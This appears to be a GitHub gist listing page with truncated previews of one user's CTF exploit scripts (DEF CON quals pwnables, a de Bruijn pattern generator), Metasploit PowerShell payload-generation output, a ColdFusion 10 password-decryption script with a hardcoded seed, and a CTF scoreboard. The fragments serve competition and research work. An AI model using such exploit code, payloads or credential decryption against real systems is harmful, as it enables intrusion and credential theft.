

Ditmar Wendt dwendt

dwendt /
Last active May 14, 2018
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode =
def p32(v):
    # big-endian pack for the m68k target; overrides the little-endian p32 imported from pwn
    return struct.pack(">i",v)
welp.txt:
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
coldfusion10decrypt.rb:
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from
SEED = 'EB3452127614E25A'
def decrypt(cpass)
coldfusion10decrypt.rb (earlier revision):
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn ( on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

dwendt / gist:c25895fde82730b8f17f
Created Mar 25, 2016
SunCTF scores that CTFTime won't accept
"standings": [
"id": 393,
"pos": 1,
"score": 1905,
"team": "eipiplus1equals0"
"id": 135,
dwendt /
Created Jul 16, 2015

LegitBS Quals 2015 - thing2 (4pts)

For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr: ruby solution

Prerequisite Knowledge

  • C++ Object Memory Layout (Virtual Function Tables)
  • Windows 64bit ABI / Calling Convention
  • ROP
gist:5cc5223d4686d0e33209:
var memoArr = {};
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset
function deBruijn (charset, maxlen, n) {
    var k = charset.length;
    var a = [];
    for (var i = 0; i < k * n; i++) a.push(0);
    if (maxlen.toString() in memoArr)
        return memoArr[maxlen.toString()];
    for (var k in memoArr) {
dwendt / thing2.exe.rb
Created Jun 10, 2015
thing2.exe - legitbs defcon quals 2015 - 4pt pwnable
#!/usr/bin/env ruby
require 'socket'
#require 'hexdump'
$dbg = false
$sock = TCPSocket.new("localhost", 4141)
def recv_until(str)
  data = ""
  while tmp = $sock.recv(1024) and not tmp.empty?